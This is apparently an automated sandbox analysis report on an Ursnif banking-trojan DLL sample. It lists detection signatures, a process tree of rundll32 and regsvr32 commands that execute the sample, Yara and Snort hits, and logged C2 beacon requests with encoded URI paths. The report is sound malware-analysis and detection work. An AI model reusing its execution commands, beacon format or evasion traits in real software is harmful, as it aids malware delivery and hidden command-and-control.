
Windows Analysis Report qT9Qk5aKTk.dll

Overview

General Information

Sample Name: qT9Qk5aKTk.dll
Analysis ID: 481107
MD5: 58d9e2906f42336e9bee1137b4cf5839
SHA1: 7f29e42f6d317d7b11ad164a672e91e4515b5bc0
SHA256: a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Found stalling execution ending in API Sleep call
Writes or reads registry keys via WMI
PE file has nameless sections
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3560 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 572 cmdline: rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3528 cmdline: regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5080 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 4536 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3276 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4132 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5644 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2200 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4620 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6272 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6420 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6532 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6832 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7040 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6284 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 768 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1268 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6568 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5852 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4504 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6812 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4580 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5520 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4928 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2188 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Exequatur MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4976 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Meith MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 64 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.rundll32.exe.3380000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
27.2.rundll32.exe.d50000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
31.2.rundll32.exe.400000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
26.2.rundll32.exe.4420000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.regsvr32.exe.5e0000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(5 of 21 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: qT9Qk5aKTk.dll | Virustotal: Detection: 80%
Source: qT9Qk5aKTk.dll | Metadefender: Detection: 59%
Source: qT9Qk5aKTk.dll | ReversingLabs: Detection: 82%
Antivirus / Scanner detection for submitted sample
Source: qT9Qk5aKTk.dll | Avira: detected
Source: 0.2.loaddll32.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.regsvr32.exe.5e0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 31.2.rundll32.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: qT9Qk5aKTk.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00EC12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00EC12D4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_00C812D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00C812D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_04B312D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,10_2_04B312D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_054712D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_054712D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 17_2_04F412D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,17_2_04F412D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 29_2_052D12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,29_2_052D12D4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49824 -> 13.225.29.191:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49887 -> 13.225.29.191:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49887 -> 13.225.29.191:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49935 -> 13.225.29.204:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49935 -> 13.225.29.204:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49938 -> 13.225.29.191:80
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | DNS traffic detected: queries for: www.msn.com
Source: global traffic | HTTP traffic detected:
    GET /cookieconsentpub/v1/geo/location HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: geolocation.onetrust.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /tag?o=6208086025961472&upapi=true HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: btloader.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: img.img-taboola.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49821 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
